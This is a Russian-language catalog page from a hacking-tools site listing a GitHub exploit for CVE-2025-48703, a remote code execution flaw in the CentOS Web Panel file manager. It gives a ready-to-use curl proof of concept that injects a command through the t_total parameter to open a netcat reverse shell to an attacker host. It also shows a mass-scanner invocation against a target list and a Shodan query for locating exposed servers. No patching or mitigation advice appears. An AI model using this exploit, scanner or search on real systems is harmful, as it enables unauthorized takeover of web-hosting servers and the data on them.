Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/skynoxk/cve-2025-48703
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Удалённое выполнение кода в веб-панели CentOS

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-48703 - Удалённое выполнение кода (RCE) в cPanel File Manager

📌 Описание

CVE-2025-48703 — это уязвимость удалённого выполнения кода (RCE) в модуле filemanager панели управления веб-хостингом (например, cPanel). Она возникает из-за небезопасной обработки входных данных в функции acc=changePerm, что позволяет атакующему внедрять и выполнять произвольные системные команды с помощью параметра t_total.


🧨 Воздействие

Эта уязвимость позволяет атакующим:

  • Выполнять произвольные команды на целевом сервере.
  • Устанавливать reverse shell для постоянного доступа.
  • Потенциально повышать привилегии или перемещаться по сети.

⚠️ Атака может быть выполнена с минимальной аутентификацией или, в некоторых конфигурациях, без аутентификации.


🚀 Proof-of-Concept (PoC)

✅ Команда Reverse Shell

root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

Использование сканера

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Поиск через Shodan

root@kitploit:~
Server: cwpsrv

Ссылка: https://fenrisk.com/rce-centos-webpanel

Скачать инструмент